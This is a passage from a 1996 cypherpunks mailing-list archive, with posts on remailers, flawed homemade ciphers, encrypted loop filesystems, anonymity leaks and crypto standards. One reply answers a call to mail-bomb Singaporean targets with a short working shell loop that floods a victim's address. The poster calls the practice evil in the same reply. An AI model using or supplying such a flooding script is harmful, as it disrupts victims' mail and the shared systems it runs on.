says Helsingius.

Child porn claims proven false

Last Sunday´s issue of the English newspaper Observer claimed that the 
remailer has been used for transmitting child pornography pictures. The 
claims have been investigated by the Finnish police. Observer´s claims 
have been found groundless.

Police sergeant Kaj Malmberg from the Helsinki Police Crime Squad is 
specialized in investigating computer crimes. He confirms that already a 
year ago Johan Helsingius restricted the operations of his remailer so that 
it cannot transmit pictures.

"The true amount of child pornography in Internet is difficult to assess, 
but one thing is clear: We have not found any cases where child porn 
pictures were transmitted from Finland", Kaj Malmberg says.

Ground rules need to be clarified

There are several large network projects going on in Finland at the 
moment, such as the TIVEKE project run by the Ministry of 
Communications and the Information Society Forum project run by the 
Ministry of Finance. Johan Helsingius is participating the work of these 
projects. Projects assess the political and social issues of networks and 
the impact of these issues in the long run. These projects also need the 
support of daily, practical work to help short-term decision-making.

Johan Helsingius is now taking an initiative in the development of the 
daily network rules. He wants to set up a task force to discuss the 
practical problems related to ethical and civil rights issues in connection 
with the Internet.

"I will try to set up a task force which will include Internet 
experts together with representatives of civic organizations and 
authorities. The task force could take a stand on issues such as the 
network´s practical operation methods and the misuse of the network. I 
hope that the results of this task force will support the development of 
the network", he says. 

For further information, please contact

Johan Helsingius
Oy Penetic Ab
tel. +358 0400 2605
e-mail: julf@penet.fi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 31 Aug 1996 07:49:54 +0800
To: cypherpunks@toad.com
Subject: Re: Nuke Singapore Back into the Stone Age
In-Reply-To: <199608300938.FAA08698@booz.bah.com>
Message-ID: <m2d9085yrx.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Charley" == Charley Sparks <sparks@bah.com> writes:

Charley> We could launch a mail-bomb campaign.. I am looking for the
Charley> source for a mail bomb program. WinTel would be nice but I
Charley> could use Linux

This isn't rocket science.

#! /bin/sh
# call as:  mailbomb victim@somewhere.sg
while true; do
	mail $1 < /usr/local/bin/xemacs
done

Mail bombing is an evil thing -- the most likely victims of a mail
bombing are innocent of wrong doing (such as the other users on the
system where a script similar to the above is run on).
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 31 Aug 1996 07:11:27 +0800
To: dthorn@gte.net
Subject: Re: Encryption
Message-ID: <9608302028.AA00579@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't have a vested interest other than keeping my data safe.

A *good* cipher will work, even if someone knows the exact 
implementation of it.  Given complete source code to your cipher,
(including the pseudo-random number generator you use) 
and I could easily crack it with about a week's worth of effort.

If you knew anything about cryptography, you'ld know that just
giving someone some cyphertext and challenging them to crack
is not a valid test of the cipher's strength.

Again - go get a copy of Applied Cryptography and don't 
come back until you have read it.

Dan

> 
> Your comments are typical for persons with vested interests.
> Attached is a test file so you can have someone try to crack it.  In the 
> meantime, don't assume because I don't use your favorite methods I don't 
> know what I'm doing.
> 
> Daniel R. Oelke wrote:
> > 
> > Sorry to say this - but your idea stinks.
> > 
> > If you are trying to send something encrypted, your
> > receiving party would need the keys, which are the seed
> > values of the pseudo-random number generators.
> > 
> > Your adversary could keep trying a whole series of
> > different seeds until they found the correct one.
> > With a little more work, they could analyze the
> > pseudo-random number generator that you used, and
> > then work backwards.
> > 
> > Go get a copy of Applied Cryptography Edition II.
> > Don't come back until you have read it.
> > 
> > ------------------------------------------------------------------
[ crap deleted ]

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: youssefy@ucla.edu
Date: Sat, 31 Aug 1996 08:38:12 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Lite
Message-ID: <2.2.32.19960830224901.006adf2c@pop.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was a posting by someone about three weeks ago that gave the address
for a person who ran a filtered version of the cypherpunks list, can someone
please repost that information?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Suto <ben@alliedtours.com>
Date: Sat, 31 Aug 1996 07:19:03 +0800
To: "cypherpunks@toad.com>
Subject: RE: Encryption
Message-ID: <01BB9693.9F57A220@ben.alliedtours.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm probably the last person who could mention something intelligible here, but assuming this encryption algorithm works, and Joe wants to give Jane a file, how would he tell her how to decrypt it?  

If he found a "secure medium" to give her the passcode under, wouldn't encrypting it be useless since he could just use that secure medium to send the original file?  

I think that was the whole point of public key encryption, in that there is no need for a secure medium of any sort, since the public key can only be used to encrypt a message.. that only the private key can decode.

Someone correct me if I'm wrong.
There are probably other flaws inherent in this encryption system mentioned.. I can imagine that you won't even be able to unencrypt the original message. :)



----------
From: 	Dale Thorn[SMTP:dthorn@gte.net]
Sent: 	Friday, August 30, 1996 5:00 AM
To: 	cypherpunks@toad.com
Subject: 	Encryption

It appears to me that PGP encryption et al is really 1940's technology, 
albeit fancied up by 1990's computers.  Why use keys and cyphers when 
all you should have to do is maximize the randomization of bits in a 
script?  Big computers should not be able to de-randomize such encoding, 
since the permutations/combinations would be astronomical after just a 
half-dozen or so random number initializations, as well as the fact that 
the bits are relatively undifferentiated (just ones and zeros) and are 
not maintained with their original bytes, words, paragraphs, or pages?

<<File: ATT00003.txt>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phillip <root@anx0918.slip.appstate.edu>
Date: Sat, 31 Aug 1996 08:00:49 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: (Fwd) Re: New file system
In-Reply-To: <199608300642.CAA16656@unix.asb.com>
Message-ID: <Pine.LNX.3.94.960830170029.6378A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 30 Aug 1996, Deranged Mutant wrote:

> I'm not on the list currently, but I this person is looking for info on 
> putting filesystems in other files and I no longer have the refs to 
> what some members of the list were doing.
> 
> ------- Forwarded Message Follows -------
> 
> At 12:38 PM 7/26/96 +0000, you wrote:
> >On 26 Jul 96 at 3:07, free-dos@vpro.nl wrote:
> >
> >> I ask this here since I can't find anywhere else to ask this.
> >
> >> I'm looking for / thinking about writing a library that allows 
> >> for a file system to exist inside of a single file (much 
> >> like the microsoft OLE document).  This is needed for a project 
> >> of mine.
> >
> >Check the Linux 2.0 distribution. I believe it allows this.  There's 
> >also some cypherpunks talk recently about hiding encrypted 
> >filesystems in other files, so you may want to check the archives in 
> >hks.net.
> >
CONFIG_BLK_DEV_LOOP
  Enabling this option will allow you to mount a file as a file system.
  This is useful if you want to check an ISO9660 file system before
  burning the CD, or want to use floppy images without first writing
  them to floppy.
  This option also allows one to mount a filesystem with encryption.
  To use these features, you need a recent version of mount, such as
  the one found at ftp.win.tue.nl:/pub/linux/util/mount-2.5X.tar.gz.
  If you want to use encryption, you might also be interested in the
  (old) DES package ftp.funet.fi:/pub/OS/Linux/BETA/loop/des.1.tar.gz.
  Note that this loop device has nothing to do with the loopback
  device used for network connections from the machine to itself.
  Most users will answer N here.

> 
> Could you give me a good site to look into this? I tried coast.net with
> no luck since the source is spread over a good number of directorys.
> 
> 
> 
> >> Requirements:   
> >> 
> >>    Mulitiple files and a hiarchial directory reside in a single
> >> file.
> >> 
> >>    The file starts out as small as possible then it becomes 
> >> bigger as more files and directorys are added to it.
> >> 
> >>    The files inside the file system can be added, renamed, 
> >> delete, moved, fragged.  (there must be a way to defrag the 
> >> files)
> >> 
> >>    Each file in the file system can have mulitiple streams much
> >> like the NTFS file system.
> >> 
> >> End of requirements.
> >> 
> >>    Does anyone know of a library like this and if so where 
> >> if not does anyone have any ideas on how this could work.  
> >> Currently i'm looking at modiling the system after the 
> >> UNIX file system.
> >> 
> >> Any ideas / comments please respond by email to:
> >> hawk@idir.net.  
> >> 
> >> Use subject: 'Re: New file system'
> >> 
> >> 
> >> e-mail: hawk@inf.net
> > 
> 
> ---
> No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
> Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
> Send a message with the subject "send pgp-key" for a copy of my key.
> 
> 

A professor is one who talks in someone else's sleep. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Germano Caronni <caronni@tik.ee.ethz.ch>
Date: Sat, 31 Aug 1996 02:46:13 +0800
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Encryption
In-Reply-To: <3226ADC6.6C87@gte.net>
Message-ID: <199608301540.RAA06793@kom30.ethz.ch>
MIME-Version: 1.0
Content-Type: text


Dale Thorn wrote:
> It appears to me that PGP encryption et al is really 1940's technology, 
> albeit fancied up by 1990's computers.  Why use keys and cyphers when 
> all you should have to do is maximize the randomization of bits in a 
[...]
> Algorithm: Select bit-groups of random length from the file until the file is
>            completely processed.  Shuffle the bits in each group randomly and
>            save each group back to the file. Repeat if needed using different
>            key-strings for each successive encryption, for increased security.


Very nice. There are just two little issues:

a) How do you generate the random bytes?
b) How do you transmit them to the other side, without having a secure channel?

In 1940, you needed airplanes to solve b), now you can use PGP (or any 
other combined strong asymmetric & symmetric crypto) to solve b) and
partially even a), saving you a lot of fuel ;-)

BTW: In my opinion, your 'randomization of bits' corresponds to cyphers, 
and the way you randomize them corresponds to 'keys'.


My 0.2 cents worth.

Gec




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Sat, 31 Aug 1996 08:41:08 +0800
To: cypherpunks@toad.com
Subject: Dr. Vulis is a test, right? [was RE: Desubscribe]
Message-ID: <2.2.32.19960830224855.00355560@labg30>
MIME-Version: 1.0
Content-Type: text/plain


I can't believe it any more.

On Fri, 30 Aug 96 02:47:21 EDT, Dr. (of what, pray tell?) Vulis blathers first:

>> > If you don't have the brains to forge the From:, then you have no
>> > business being subscribed to any mailing list.

and then again:

>Whoever uses the term "spam" in derogatory manner, opposes free
>speech and deserves to be caned.

First, accusing someone of stupidity for not having learned how to telnet to
an SMTP server is a bit harsh, especially since the guy might be stuck
behind a firewall that mungs his addresses AFTER his messages goes out --
not that Dr. V bothered to find out before the accusation.

Second, suggesting anyone be caned for their political beliefs (and
resultant speech) is quite obviously NOT the action taken by someone who
defends free speech.  Again, Dr. V. put those beliefs in his words through
his flawed logic.

It's like watching a KKKlucker yelling, "you have no right to say that we
don't support free speech," and not getting it.

And for what -- the thoughtcrime of calling Dr. V a spammer?  Hmm.  About
the closest I can come to finding a "crime" here is trademark infringement.
I'm sure Hormel is following this closely.

All of this is merely annoying.  But slamming Tim May because of his
heritage?  "criminal Arm*nian grandparents"?  Now it's a crime not only to
call Dr. V a spammer, but to have ancestors born someplace his ancestors
taught him to not approve of.  (Can you say "racism", kids?  Sure.  I knew
you could.)

When I first started reading this list, it was about the time Jim Bell was
espousing the A.P. theories, and I thought him a fool for it.  I put his
name in my filter, sending his posts to the trash.  More and more, I found
myself heading to the trash bin to follow a thread that Jim was contributing
to.  Valuable contributions, mind you, not just more of his A.P. stuff.  Of
course, I ended up removing him from my filter.  (For missing that month of
your posts, Jim, I owe you an apology.)

At that time, I realized a few things:  Filters certainly aren't the answer;
and everybody can come up with valuable contributions.

Anyway, my current status is to have the filters set to remove posts with
the words [NOISE] or [OFF-TOPIC] somewhere in the headers.  It helps weed
out stuff that really isn't why I'm here reading this list.

Given that I feel that even Dr. Vulis might possibly contribute something of
value to this list at some unspecified time in the future, I have come to
the conclusion that the only solution is to ask him to change his e-mail
name field to:

  dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM [NOISE] )

until such time as he can actually come up with something useful to say to
the rest of us.  Maybe he could even throw in an [-L18] tag, if he's going
to continue to [spit | fuck | fart] every posting that leaps through his screen.

[ Note to everyone else:  that's SARCASM there, hope you got it! ]

So, my original question is:  is there really a Dr. Dmitri Vulis (KOTM)
somewhere?  Or is he just some made-up straw man, created by Tim May, John
Gilmore and Eric Hughes for their personal amusement, and to add a spot of
controversy so we can feel like we're not preaching to the choir with every
pro-cypher posting?  I often thought that was the case with David Sternlight
as well.  Or is Dr. Vulis really best-buddies with Tim May, and his way of
showing affection is to "fart in his general direction" with every post?

If he exists, I pity the unsuspecting students who wander into his class who
might not have the genetic makeup he approves of.  And now I *completely*
understand tenure.

John (soon-to-be-spit-upon,no-doubt) Deters.
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 31 Aug 1996 07:50:09 +0800
To: cypherpunks@toad.com
Subject: Re: Nuke Singapore Back into the Stone Age
Message-ID: <9608302209.AB20820@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Aug 96 at 5:38, Charley Sparks wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> To: tcmay@got.net, cypherpunks@toad.com
> Date: Fri Aug 30 05:45:44 1996
> We could launch a mail-bomb campaign.. I am looking for the source
> for a mail bomb program. WinTel would be nice but I could use Linux

Far from my mind to commit such nuisance acts, but by simple 
curiosity, is there a mailbomb HOW-TO or FAQ floating around?

jfa
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 31 Aug 1996 09:13:21 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: MUD anyone?
In-Reply-To: <ae4c85ab040210040813@[205.199.118.202]>
Message-ID: <199608302312.SAA12806@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> (Before defenders of these games jump in with comments about how useful and
> enjoyable these games are, sure, some knowledge is gained. But huge
> differences are obvious. A conclusion drawn from playing these games will
> not hold up in the real world. I expect the same is true of "assassination
> politics.")

By the way, has anyone noticed how injections of money from the 
Central Bank in the Monopoly game fuel inflation?

The interesting thing is, in Monopoly inflation does not seem to be
as destructive as in real life...

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Sat, 31 Aug 1996 04:48:06 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption (shuffling proposal)
Message-ID: <9608301715.AA11990@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



>  DALE THORN ON CRYPTOGRAPHY: (edited for brevity)

>  It appears to me that PGP encryption et al is really 1940's technology, 
>  albeit fancied up by 1990's computers.  Why use keys and cyphers when 
>  all you should have to do is maximize the randomization of bits in a 
>  script?

>  Algorithm: Select bit-groups of random length from the file until the file is
>             completely processed.  Shuffle the bits in each group randomly and
>             save each group back to the file. Repeat if needed using different
>             key-strings for each successive encryption, for increased security.

>  "Due to the nature of compounded bit-shuffling, no algorithm ever developed
>  or proposed could 'crack' multi-pass encoding with a single decryption pass.


You are producing a permutation table.  Repeat passes just get you
a new table, no different in principle.


>  [Time calc for 12kb file....]


>  "One of the difficulties in breaking this type of encryption (other than the
>  numerical time factors) is the fact that you might have to deal with several
>  unknown random number generators from different compiled executable programs.
>  Add to this another factor, the 'Intelligent User' who adds their own tweaks
>  to the source code. The tweak is added, the program is compiled, the file(s)
>  are encrypted, and then the modified source code is destroyed along with the
>  executable file.

But the internet worm of 1988 was captured, decompiled and analysed in days.
Self-modifying viruses get analysed (by single stepping).  Your programs will
go the same way as soon as there is (financial ?) motivation.

So the users have to know the algorithms, including "tweaks" in order
to communicate ?  Not the most convenient key.


>  EXAMPLE    when_it_rains_it's_a_bath   (least significant bit at left):

>     11101110000101101010011001110110111110101001011000
>     10111011111010010011101000011010010110011101101100
>     11101111101010010110001011101110010011001110111110
>     10100001101111101001000110100001100010111000010110

becomes

>     01011100010110101100011110101000011101101111101011
>     00101101100011111010010101111001011001000100000101
>     00111101010101011011000011101111001111110101001011
>     11101000001101101110101011000100111111000010111001


>From this known plaintext-cyphertext pair the enemy can list
all the possible sources and destinations of each bit.

EG  first bit of plaintext (position 0, value 1) can move to 1,3,4,5,....,199
   second bit of plaintext (position 1, value 1) can move to 1,3,4,5,....,199

Given a number of pairs of the same length, produced with the
same key details each of these lists of possibilities shrinks
by around half.  Your 12kb file is well on the way to being
cracked after 4+10+3=17 pairs are discovered.

If the intention is never to reuse keys, then this scheme gets
you nothing you couldn't have with a normal stream cipher.
And they, don't reveal the number of 1-bits and 0-bits in the
message.  Different messages will be recognisable different.

A chosen plaintext attack (where these are possible) becomes a breeze.

>        b. Passwords/phrases, algorithms, code routines, and even whole programs
>           might change from step to step, thereby invalidating any 'single-pass'
>           decryption scheme that's likely to be proposed.

How are the above remarks invalidated ?

I don't want to stifle creativity.  If you keep thinking you may
come up with a good idea.  But this isn't it.

I encourage you to read about existing systems.  There have been
bright people before, and things are done (or not done) for a reason.





 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apteryx@super.zippo.com (Mark Heaney)
Date: Sat, 31 Aug 1996 05:26:06 +0800
To: cypherpunks@toad.com
Subject: Re: PGP & Default
Message-ID: <32272d82.348928496@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 30 Aug 1996 01:13:23 -0400 (EDT), lcs Remailer Administrator
<mix-admin@nym.alias.net> wrote:

[snip]

>to the file $HOME/.pgp/config.txt.  (Or wherever the equivalent is
>under DOS.  Perhaps someone can tell me where the config.txt file
>lives under DOS and I will add that to the help file.)

It's in the same directory as PGP, which will be the directory
referenced by the SET PGPPATH statement in the autoexec.bat file if
PGP is installed and configured correctly. At least with version
2.6.2. You can use MyName="any string of characters that is specific
enough to identify one and only one key". I have mine set as my name,
so that no matter what e-mail address I use, PGP uses the right key.

Mark


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMicvtN36bir1/qfZAQFnzgMAxTk55pldFWgysbjOj1Tqt/KAfB4Ty2WA
EmTLRMziw8QglZSDzRxKcfvU3XjefNM7kA8YYPaKcgOlEhDiKB+Z9WDGMwwSJePk
CFgTRPtuZS4kpjGsTZIvQN31ZqB5Ko0f
=kSuW
-----END PGP SIGNATURE-----

-----------------------------------------------------------------
Mark Heaney    finger snipe@starburst.cbl.cees.edu for public key
PGP Fingerprint= BB D8 9B 07 51 87 05 AC  47 7B F2 4F A6 AB 1A CD   
-----------------------------------------------------------------
You keep using that word, I dunna think it means what you think it means.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 31 Aug 1996 08:24:52 +0800
To: cypherpunks@toad.com
Subject: Re: **"OuR" Project press release** (fwd)
Message-ID: <9608302225.AA22270@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 30 Aug 96 at 12:25, jim bell wrote:


> Recommendation for the next one:  Rather than try to brute force  an
> LEO from about sea level, how about  lofting the rocket by balloon
> up to a starting altitude of, say, 100,000 feet, and letting'er'rip
> from there?  (this is probably not a new technique...)

This technique has been used a lot.  But bear in mind that the goal
of the whole operation was to perfect their knowledge of the
technology of rockets.  Launching from a balloon born platform is
not a triviality.  Ground launch enables much more control in the
super critical phase called "countdown and launch", where a lot of
the failures occurs.  When they will have mastered theses phases, 
then, the'll start thinking about an airborne launch platform.

If you want to learn about it, there is a rocketry group on Usenet.
>From there, you can ask directions for various sites, mainly outside
of north america, where they experiment with homebuilt liquid-liquid,
liquid-solid and other engines.  There is also quite a large movement
in USA, but I did not find (a year ago), sites that were as
experimental as the europeans (Belgians?) ones.   It seems that the 
US sites are more talking about using some commercially built motors, 
mainly using liquid-solid technology.

Have fun

jfa
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 31 Aug 1996 11:03:18 +0800
To: cypherpunks@toad.com
Subject: libertarian-punks@toad.com
Message-ID: <199608310037.TAA13127@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


how about creating a mailing list with the captioned name?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sat, 31 Aug 1996 12:50:50 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Intel to rule the basic crypto engine market?
Message-ID: <199608310237.TAA10525@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About: 30 Aug 96, 19:44, William H. Geiger III misspelled:

goverment  (government)
alow   (allow)        
here cries  (Should be hear)
atemps  (attempts)
instpected  (inspected)
believeing   (believing)

But, he is getting better.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 31 Aug 1996 11:32:12 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Intel to rule the basic crypto engine market?
In-Reply-To: <199608300330.UAA14539@mail.pacifier.com>
Message-ID: <199608310131.UAA01464@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199608300330.UAA14539@mail.pacifier.com>, on 08/29/96 at 08:27 PM,
   jim bell <jimbell@pacifier.com> said:

>At 03:56 AM 8/24/96 -0500, William H. Geiger III wrote:

>>Intresting but..., In the era of ITAR, GAK, Key Escrows,Clipper,& FileGate 
>>do we really want to put all our eggs in one basket? And that basket being 
>>based on hardware? IMHO I don't see Intell standing up to the government any 
>>more than Netscape, Mircosoft, IBM, or Lotus has. I have serious doubts that 
>>our "beloved" goverment will alow any standard to be adopted that does not 
>>allow them access whenever they please. I personally do not run any security 
>>code on my machines that I do not have the
>>source for & have instpected.


>The one kind of standardization in the crypto market that we truly need, 
>NOW, is a standard format/protocol so that crypto telephones from all 
>manufacturers can talk to each other.  The last thing we need is a 
>tower-of-Babel situation, which would be even worse than the VHS/Beta wars 
>of 20-10 years ago.


But who's standard?

I constantly here cries for standardization from those in the computer industry. I for one am against it. I like having choices, choices that are taken away by standardization.

In the area of crypto telephones I am definitely against standardization. If I wish to have an encrypted telephone connection my primary concern is that it is secure not whether or not I can communicate to every other phone out there.

I fear that an organized attempt to standardize will only bring about a 'weak' protocol for encrypted communications. One only has to look at what other standardization atemps have produced. Look at the works of IBM, Lotus, Microsoft, Netscape, all who have a vested interest in international sales. They have all to often tried to pawn off weak security in favor of the $$ from international sales.

A tower-of-babel is exactly what we need. The free market at its finest. The lemmings and the ignorant will use products from the "major" manufactures falsely believeing that they are secure. Those of us truly concerned with our security will have other choices to make.

Just my 2 cents,


--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Sat, 31 Aug 1996 12:48:19 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
Message-ID: <199608310245.TAA21234@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>>
>>I have found and reported to the anonymizer that it does not 
>>always protect you against perl-based cgi scripts.  I did this by 
>>accessing a form-based email page (based on Matt's script) which includes 
>>environment variable values in the msg to the recipient.  I didn't 
>>receive any response back from them after I emailed them the info.
>
>
>   Am I missing something here because isn't the easiest way around all 
of this is simply not to enter your personal info when setting up 
Netscape?  Granted the page can pick up your ISP and what port you used, 
but so what?  It can't get your name and em
ail address.  Use a newsreader such as Free Agent so there's no reason 
to enter your personal info.  If there is a reason to respond to someone 
who's email is in on a particular page, then copy it and paste to your 
emailer... >
>
  I don't like getting the junk-email after visiting some pages, telling
  me what a great service they have (Hey I was just there!!), etc.


--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Sat, 31 Aug 1996 15:06:17 +0800
To: cypherpunks@toad.com
Subject: Re: ~~ Bankers' Secrets ~~
Message-ID: <199608310253.TAA23490@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>From MAILER-DAEMON  Fri Aug 30 19:41:53 1996
X-FreePort-Flags:        
Received: from emin02.mail.aol.com (emin02.mx.aol.com [198.81.11.51]) by scn.org (8.7.5/8.6.12) with SMTP id TAA20565 for <bf578@scn.org>; Fri, 30 Aug 1996 19:41:50 -0700 (PDT)
Received: by emin02.mail.aol.com (8.6.12/8.6.12) id WAA26649 for bf578@scn.org; Fri, 30 Aug 1996 22:36:32 -0400
Date: Fri, 30 Aug 1996 22:36:32 -0400
Message-Id: <199608310236.WAA26649@emin02.mail.aol.com>
From: Mailer-daemon@aol.com
Subject: Returned Mail: Undeliverable
To: bf578@scn.org

The mail you sent could not be delivered to:
550 massmail@aol.com is not a known user

The text you sent follows:

>From bf578@scn.org  Fri Aug 30 22:36:02 1996
Return-Path: bf578@scn.org
Received: from scn.org (scn.org [198.137.188.24]) by emin02.mail.aol.com (8.6.12/8.6.12) with ESMTP id WAA26547 for <massmail@aol.com>; Fri, 30 Aug 1996 22:36:01 -0400
Received: (from bf578@localhost) by scn.org (8.7.5/8.6.12) id TAA20156; Fri, 30 Aug 1996 19:40:32 -0700 (PDT)
Date: Fri, 30 Aug 1996 19:40:32 -0700 (PDT)
Message-Id: <199608310240.TAA20156@scn.org>
From: bf578@scn.org (SCN User)
To: massmail@aol.com
Subject: Re: ~~ Bankers' Secrets ~~
Reply-To: bf578@scn.org

>
>=======> BANKING SECRETS REVEALED!! <=======
>
>====> SAVE $100,000 & EARN 7% to 10% INTEREST <====
>
>Dear Friend, 
>
>Did you know that you can save up to $100,000 on the 
>biggest investment in your life? For MANY Americans they
>have a dream to one day own their home. When that dream is
>reached, they spend the rest of their life paying that dream

  Funny, they didn't leave an email address?
  Probably don't even know what lists this is be posted to!

 
  For the money you probably get info on how to call your
  mortgage company and find out if makeing smaller/earlier payments
  will reduce the principle and the interest re-caculated.
  Then invest the money you save to earn interest!
  
  I know several people who do this.  You don't make extra payments
  just divde your $1000 month (or whatever) into 3 $333.33 payments.
  You need a sizable principle/long term loan for this to
   be worthwhile, and of course a properly worded mortgage.


--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Sat, 31 Aug 1996 10:43:45 +0800
To: cypherpunks@toad.com
Subject: Re: anon.penet.fi closing down
Message-ID: <m0uwdkO-000bJjC@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


what would be alternatives to anon.penet.fi..... 
==========================================
   Blake Wehlage <jwilk@iglou.com>
   ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
 Goto: http://members.iglou.com/jwilk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 31 Aug 1996 13:41:10 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
In-Reply-To: <199608302014.WAA08916@basement.replay.com>
Message-ID: <199608310328.UAA19396@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> At 06:12 AM 8/30/96 -1000, NetSurfer wrote:
> >
> >I have found and reported to the anonymizer that it does not 
> >always protect you against perl-based cgi scripts.  I did this by 
> >accessing a form-based email page (based on Matt's script) which includes 
> >environment variable values in the msg to the recipient.  I didn't 
> >receive any response back from them after I emailed them the info.
> 
> 
>    Am I missing something here because isn't the easiest way around all 
> of this is simply not to enter your personal info when setting up Netscape?  
> Granted the page can pick up your ISP and what port you used, but so what?  
> It can't get your name and email address.  Use a newsreader such as Free 
> Agent so there's no reason to enter your personal info.  If there is a reason 
> to respond to someone who's email is in on a particular page, then copy it 
> and paste to your emailer...

Please hit your carriage return once in a while. I had to format your post
manually so I could read it.

If the destination server can pick the port you used, there's a good chance
they can figure out your account name, and therefore your email address.
Many sites these days run identd, which in my opinion is a simply annoying
daemon. Most of those that run it run it because some of their users, most
of whom couldn't find two brain cells to rub together, whine about their
precious IRC servers not allowing them on without it, instead of simply
using IRC servers that will.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stu Barrett" <stu@zilker.net>
Date: Sat, 31 Aug 1996 12:15:53 +0800
To: Jim Choate <jimbell@pacifier.com>
